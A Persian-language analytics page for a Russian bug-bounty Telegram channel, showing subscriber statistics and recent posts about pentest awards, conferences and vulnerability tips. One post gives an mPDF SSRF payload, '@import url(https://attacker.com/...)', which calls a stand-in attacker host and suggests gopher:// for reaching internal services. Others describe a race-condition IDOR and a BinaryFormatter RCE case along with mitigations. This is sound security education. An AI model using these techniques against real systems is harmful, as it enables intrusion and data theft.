fa
Feedback
SHADOW:Group

SHADOW:Group

رفتن به کانال در Telegram

Чат: @shadow_chat_tg Рекламу не размещаю. Админ - @shdwpwn

نمایش بیشتر

📈 تحلیل کانال تلگرام SHADOW:Group

کانال SHADOW:Group (@shadow_group_tg) در بخش زبانی روسی بازیگری فعال است. در حال حاضر جامعه شامل 11 493 مشترک است و جایگاه 10 489 را در دسته فناوری و برنامه‌ها و رتبه 55 704 را در منطقه روسيا دارد.

📊 شاخص‌های مخاطب و پویایی

از زمان ایجاد در невідомо، پروژه رشد سریعی داشته و 11 493 مشترک جذب کرده است.

بر اساس آخرین داده‌ها در تاریخ 26 اوت, 2026، کانال فعالیت پایداری دارد. در ۳۰ روز گذشته تغییر اعضا برابر -2 و در ۲۴ ساعت گذشته برابر 0 بوده و همچنان دسترسی گسترده‌ای حفظ شده است.

  • وضعیت تأیید: تأیید نشده
  • نرخ تعامل (ER): میانگین تعامل مخاطب 30.16% است و در ۲۴ ساعت نخست پس از انتشار، محتوا معمولاً 10.54% واکنش نسبت به کل مشترکان کسب می‌کند.
  • دسترسی پست‌ها: هر پست به طور میانگین 3 467 بازدید دریافت می‌کند. در اولین روز معمولاً 1 212 بازدید جمع‌آوری می‌شود.
  • واکنش‌ها و تعامل: مخاطبان به‌طور فعال حمایت می‌کنند؛ میانگین واکنش به هر پست 59 است.
  • علایق موضوعی: محتوا بر موضوعات کلیدی مانند middleware, http/1.1, bounty, api, host تمرکز دارد.

📝 توضیح و سیاست محتوایی

نویسنده این فضا را محل بیان دیدگاه‌های شخصی توصیف می‌کند:
Чат: @shadow_chat_tg Рекламу не размещаю. Админ - @shdwpwn

به لطف به‌روزرسانی‌های پرتکرار (آخرین داده در تاریخ 27 اوت, 2026)، کانال همواره به‌روز و دارای دسترسی بالاست. تحلیل‌ها نشان می‌دهد مخاطبان به‌طور فعال با محتوا تعامل دارند و آن را به نقطه اثرگذاری مهم در دسته فناوری و برنامه‌ها تبدیل کرده‌اند.

11 493
مشترکین
اطلاعاتی وجود ندارد24 ساعت
اطلاعاتی وجود ندارد7 روز
-230 روز

در حال بارگیری داده...

جذب مشترکین
اوت '26
اوت '26
+44
در 0 کانال‌ها
ژوئیه '26
+96
در 0 کانال‌ها
Get PRO
ژوئن '26
+41
در 1 کانال‌ها
Get PRO
مه '26
+73
در 0 کانال‌ها
Get PRO
آوریل '26
+60
در 0 کانال‌ها
Get PRO
مارس '26
+38
در 2 کانال‌ها
Get PRO
فوریه '26
+54
در 0 کانال‌ها
Get PRO
ژانویه '26
+58
در 0 کانال‌ها
Get PRO
دسامبر '25
+52
در 2 کانال‌ها
Get PRO
نوامبر '25
+53
در 0 کانال‌ها
Get PRO
اکتبر '25
+92
در 4 کانال‌ها
Get PRO
سپتامبر '25
+41
در 0 کانال‌ها
Get PRO
اوت '25
+176
در 3 کانال‌ها
Get PRO
ژوئیه '25
+51
در 2 کانال‌ها
Get PRO
ژوئن '25
+55
در 0 کانال‌ها
Get PRO
مه '25
+69
در 6 کانال‌ها
Get PRO
آوریل '25
+177
در 0 کانال‌ها
Get PRO
مارس '25
+124
در 4 کانال‌ها
Get PRO
فوریه '25
+113
در 7 کانال‌ها
Get PRO
ژانویه '25
+91
در 3 کانال‌ها
Get PRO
دسامبر '24
+80
در 1 کانال‌ها
Get PRO
نوامبر '24
+116
در 2 کانال‌ها
Get PRO
اکتبر '24
+115
در 4 کانال‌ها
Get PRO
سپتامبر '24
+235
در 4 کانال‌ها
Get PRO
اوت '24
+324
در 1 کانال‌ها
Get PRO
ژوئیه '24
+341
در 5 کانال‌ها
Get PRO
ژوئن '24
+381
در 14 کانال‌ها
Get PRO
مه '24
+325
در 4 کانال‌ها
Get PRO
آوریل '24
+336
در 7 کانال‌ها
Get PRO
مارس '24
+390
در 2 کانال‌ها
Get PRO
فوریه '24
+559
در 8 کانال‌ها
Get PRO
ژانویه '24
+427
در 8 کانال‌ها
Get PRO
دسامبر '23
+389
در 5 کانال‌ها
Get PRO
نوامبر '23
+121
در 0 کانال‌ها
Get PRO
اکتبر '23
+173
در 3 کانال‌ها
Get PRO
سپتامبر '23
+282
در 0 کانال‌ها
Get PRO
اوت '23
+231
در 0 کانال‌ها
Get PRO
ژوئیه '23
+158
در 0 کانال‌ها
Get PRO
ژوئن '23
+155
در 0 کانال‌ها
Get PRO
مه '23
+439
در 0 کانال‌ها
Get PRO
آوریل '23
+212
در 0 کانال‌ها
Get PRO
مارس '23
+131
در 0 کانال‌ها
Get PRO
فوریه '23
+72
در 0 کانال‌ها
Get PRO
ژانویه '23
+312
در 0 کانال‌ها
Get PRO
دسامبر '22
+120
در 0 کانال‌ها
Get PRO
نوامبر '22
+156
در 0 کانال‌ها
Get PRO
اکتبر '22
+567
در 0 کانال‌ها
Get PRO
سپتامبر '22
+736
در 0 کانال‌ها
Get PRO
اوت '22
+267
در 0 کانال‌ها
Get PRO
ژوئیه '22
+383
در 0 کانال‌ها
Get PRO
ژوئن '22
+143
در 0 کانال‌ها
Get PRO
مه '22
+199
در 0 کانال‌ها
Get PRO
آوریل '22
+358
در 0 کانال‌ها
Get PRO
مارس '22
+1 205
در 0 کانال‌ها
Get PRO
فوریه '22
+88
در 0 کانال‌ها
Get PRO
ژانویه '22
+181
در 0 کانال‌ها
Get PRO
دسامبر '21
+211
در 0 کانال‌ها
Get PRO
نوامبر '21
+1 106
در 0 کانال‌ها
Get PRO
اکتبر '21
+291
در 0 کانال‌ها
Get PRO
سپتامبر '21
+1 218
در 0 کانال‌ها
Get PRO
اوت '21
+799
در 0 کانال‌ها
Get PRO
ژوئیه '21
+137
در 0 کانال‌ها
Get PRO
ژوئن '21
+256
در 0 کانال‌ها
Get PRO
مه '21
+250
در 0 کانال‌ها
Get PRO
آوریل '21
+258
در 0 کانال‌ها
Get PRO
مارس '21
+261
در 0 کانال‌ها
Get PRO
فوریه '21
+392
در 0 کانال‌ها
Get PRO
ژانویه '21
+1 112
در 0 کانال‌ها
تاریخ
رشد مشترکین
اشارات
کانال‌ها
27 اوت+1
26 اوت+3
25 اوت+3
24 اوت+1
23 اوت0
22 اوت+2
21 اوت+1
20 اوت+2
19 اوت+3
18 اوت+1
17 اوت+3
16 اوت+1
15 اوت+2
14 اوت0
13 اوت+4
12 اوت+2
11 اوت0
10 اوت0
09 اوت+1
08 اوت+1
07 اوت+3
06 اوت+3
05 اوت0
04 اوت+2
03 اوت+2
02 اوت0
01 اوت+3
پست‌های کانال
Repost from Backconnect
Разбор как нашлась CVE-2026-18963: Keycloak reset-credentials flow ATO https://www.pruva.dev/reproductions/REPRO-2026-00337#artifacts Нуклей шаблон для проверки https://github.com/projectdiscovery/nuclei-templates/pull/16995/files ____ 🤓 backconnect

2
Объявлены результаты конкурса Pentest Awards 2026! И мы постепенно будем публиковать интересные кейсы, с которыми наши экспер
Объявлены результаты конкурса Pentest Awards 2026! И мы постепенно будем публиковать интересные кейсы, с которыми наши эксперты участвовали в этом конкурсе. Первым поздравляем Виктора Зварыкина: он уже второй год подряд забирает медаль "фаворит года по версии жюри". Вот что говорит сам автор о своём призовом кейсе: "Глубина — история о том, почему в информационной безопасности недостаточно просто запустить готовый инструмент и получить результат. Главный герой находит уязвимость в реальной системе, но довольно быстро понимает, что успешный взлом — это только начало. Вместе с более опытным другом он начинает разбираться, как устроена система и почему возможна эксплуатация этого вектора. Весь рассказ погружён в атмосферу цикла произведений "Глубина" Сергея Лукьяненко, где цифровой мир становится почти настоящим." Суть кейса кратко: Работы по анализу защищённости проходили в крупной иностранной компании, одной из главных задач пентеста было пробитие внешнего периметра. На этапе OSINT-разведки был обнаружен веб-интерфейс IIS (Internet Information Services), в котором часто встречается уязвимость чтения имен файлов и директорий в legacy-формате 8.3. Вследствие этого был обнаружен эндпоинт с неизвестным веб-сервисом, войти в который получилось благодаря нативно используемым учетным данным. Разобравшись с функциональностью приложения, наши герои выявили, что в одном из запросов информация передавалась как .NET-сериализованный объект, использовавший небезопасный сериализатор BinaryFormatter. Успешная эксплуатация привела к RCE через DNS-эксфильтрацию. Как избежать подобных атак: (1) Параметр реестра NtfsDisable8dot3NameCreation используется для управления созданием коротких имен файлов (в формате 8.3) на томах NTFS в операционных системах Windows. Этот параметр важен для обеспечения совместимости со старыми приложениями, использующими соглашение об именовании файлов 8.3, однако он также может влиять на производительность и безопасность. Чтобы устранить уязвимость, нужно поменять значение параметра NtfsDisable8dot3NameCreation на 1. Путь к нему: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\FileSystem\NtfsDisable8dot3NameCreation Перед изменением значения необходимо проверить функционал работающих сервисов, чтобы не нарушить работу legacy-приложений. (2) Полностью откажитесь от BinaryFormatter: его крайне сложно безопасно настроить или защитить фильтрацией. Используйте современные сериализаторы — например, System.Text.Json, а принимаемые данные проверяйте по заранее определённой структуре и разрешённым типам. Для компактного бинарного формата Microsoft рекомендует MessagePack или protobuf-net; для XML — DataContractSerializer. Начиная с .NET 9 встроенная реализация BinaryFormatter уже отключена. (3) Используйте сложные и несловарные пароли для аутентификации в веб-сервисы. Полную версию кейса Виктора в стиле "Глубины" читайте в нашем гитхабе.
1 349
3
Постов не будет, админ ушел сниматься в рилсах…
2 179
4
В этом году Pentest Award прошел в атмосфере роскоши, с шикарным видом на набережную и город. Удалось пообщаться с сильными п+2
В этом году Pentest Award прошел в атмосфере роскоши, с шикарным видом на набережную и город. Удалось пообщаться с сильными профессионалами и послушать несколько кулстори из их практики. Ну и естественно узнать немного инсайдов непосредственно от победителей. Кстати, итоги церемонии можете глянуть на Хабре. Многие вроде как планируют опубликовать свои работы на хакере, так что в скором времени вы и сами с ними ознакомитесь, там действительно есть уникальные материалы. Отдельное спасибо @poopsa_liza за приглашение и организацию, все прошло отлично. Кому интересно глянуть фоточки они есть тут, а также есть запись трансляции с самого награждения.
3 544
5
ТБанк вместо одной кнопки "Бабло", прислал сразу три. Осталось переписать скрипт, чтобы сразу Claude запускался.
2 836
6
پیام ویدیو
2 849
7
Если вы, как и я, откладывали статью до последнего, то пора отправлять.
4 163
8
Вокруг все такие молодые, красивые, богатые и успешные, поэтому призываю вас подать свою заявку на OFFZONE, чтобы рассказать, как стать таким же.
4 517
9
В эту пятницу планирую посетить конференцию Периметр от Metascan'a и вечером на оффлайн часть Bugs Zone. Если будет кто из подписчиков и знакомых, пишите, буду рад пообщаться 👀
2 343
10
Race Condition одна из тех уязвимостей, которая порой позволяет находить баги там, где их совсем не ждешь. И иногда, чтобы по
Race Condition одна из тех уязвимостей, которая порой позволяет находить баги там, где их совсем не ждешь. И иногда, чтобы получить какой-нибудь IDOR, достаточно очень много раз попросить об этом приложение. В кейсе на скрине, как раз такой случай. При указании чужого id получаем ошибку, однако, если запустить intruder и подождать несколько тысяч запросов, сервер внезапно начинает отдавать нам чужие ПД. #web #race #idor
4 139
11
Стартовал прием заявок на Pentest Award 2026 и в этом году появилась новая номинация - AI. Думаю, за последний год у многих есть что сказать по этой теме. Остальные номинации также на месте: Kill Chain, Системный взлом (Web & Logic), Device и Out of Scope. Среди призов стандартно респект от комьюнити и техника Apple. Заявки принимают до 12 июля, а церемония награждения пройдет 14 августа в мск. https://t.me/justsecurity/441
3 293
12
🪲 Топовый мерч, две недели закрытого скоупа, ламповая афтепати-вечеринка… Все это ждет вас на нашем любимом приватном ивенте
🪲 Топовый мерч, две недели закрытого скоупа, ламповая афтепати-вечеринка… Все это ждет вас на нашем любимом приватном ивенте — BUGS ZONE 7.0. Приглашения, как обычно, отправим багхантерам с лучшими результатами за сезон. 🔵Старт хантинга — 15 апреля. 🔵Церемония и афтепати — 22 мая в Москве. Попасть на ивент может каждый. Сдавайте отчеты на нашей платформе и качайте рейтинг — мы обязательно заметим самых активных. Скоро поделимся подробностями. Следите за апдейтами!
3 244
13
У mPDF есть интересная особенность, которая может вам когда-нибудь пригодиться. Если передать движку строку с @import url(...
У mPDF есть интересная особенность, которая может вам когда-нибудь пригодиться. Если передать движку строку с @import url(...), он делает внешний запрос, даже если HTML полностью экранирован htmlentities() и даже без <style>. Причина проста: mPDF ищет URL-ы через регулярки по всему входу. Поэтому достаточно вставить: @import url(https://attacker.com/test?.css) и сервер сразу пойдёт по указанному адресу. Плюс можно использовать и нестандартные протоколы вроде gopher://, превращая это в SSRF с возможностью дергать внутренние сервисы. Вендор же официально заявил, что это не баг, а фича, и устранять поведение не собирается - по их мнению, движок должен загружать указанные URL, а ответственность за реализацию лежит на разработчиках. #web #ssrf #pdf
4 021
14
Искал тут что посмотреть под еду на ютубе, и реки вывели мне сей шедевр. Прекрасно все, начиная с кулстори самого проекта, который форсили во многих изданиях, заканчивая сайтом на пыхе с паролями юзеров в открытом виде. https://www.youtube.com/watch?v=HGbP2ibfm8k
4 015
15
Иногда, когда читаешь раскрытый репорт или статью на Medium об уязвимости в багбаунти, хочется потрогать это руками и заложит
Иногда, когда читаешь раскрытый репорт или статью на Medium об уязвимости в багбаунти, хочется потрогать это руками и заложить у себя в навыках ту или иную багу немного глубже.😵‍💫 Так вот, в итоге из этой мысли я сделал: https://labs.hackadvisor.io/ Все машинки собраны из публичных репортов и статей ресерчеров. Сейчас можно разворачивать стенд, решать задачи, получать подсказки и разбор уязвимости по итогу. Буду потихоньку пилить интересные машинки из раскрытых отчётов — надеюсь, вы тоже закинете что-то интересное: оно обязательно появится. Сразу дисклеймер: у меня пока небольшой опыт в создании таких заданий, так что где-то может быть шероховато. Но со временем буду делать лучше — и сами задания, и их подачу — и добавлять больше интересных сценариев. В целом Labs — это всего лишь MVP и первый этап будущей полноценной экосистемы HackAdvisor, которая, как и всё для сообщества, совершенно бесплатна. Всех обнял, жду фидбек, баги и фича-реквесты🙌🏻 Ну и, пожалуйста, не ломайте сам Labs (даже если очень хочется) — пока там всё очень хрупко 🫠
3 306
16
Захват аккаунта через telegram-бот: от своего номера к чужому профилю Всего пять минут ожидания, один чужой номер телефона и обычная кнопка для получения ссылки — этого оказалось достаточно, чтобы обнаружить критическую уязвимость. Настолько минимальный сценарий неожиданно вскрыл проблему в логике обработки данных. Читать 👉 https://blog.deteact.ru/account-takeover-thru-telegram-bot/
3 360
17
Друзья, поздравляю вас с наступающим Новым годом 🎄 Пусть он принесёт больше спокойствия, уверенности в себе и своих идеях, н
Друзья, поздравляю вас с наступающим Новым годом 🎄 Пусть он принесёт больше спокойствия, уверенности в себе и своих идеях, новых положительных эмоций и ощущения, что вы идёте в правильном направлении. Желаю интересных и результативных находок, роста там, где вам действительно важно, и достижения новых высот. Постарайтесь отдохнуть в эти праздники и набраться сил. Пусть в новом году всё станет хотя бы немного лучше, чем в прошлом. Спасибо, что вы здесь. Увидимся в 2026 ❤️
3 543
18
кстати, это я) узнали? согласны?
кстати, это я) узнали? согласны?
3 216
19
Вот с таким интересным принтом получил футболку от ребят из BI.ZONE Bug Bounty. Говорят, если присмотреться, то можно увидеть
Вот с таким интересным принтом получил футболку от ребят из BI.ZONE Bug Bounty. Говорят, если присмотреться, то можно увидеть на нем множество знакомых лиц из багбаунти сообщества. Я узнал примерно половину)
3 187
20
Недавно занял 2 место в приватном ивенте от ТБанка. Ребята порадовали интересным скоупом и достойными выплатами за что им бол
Недавно занял 2 место в приватном ивенте от ТБанка. Ребята порадовали интересным скоупом и достойными выплатами за что им большой респект 😎
3 975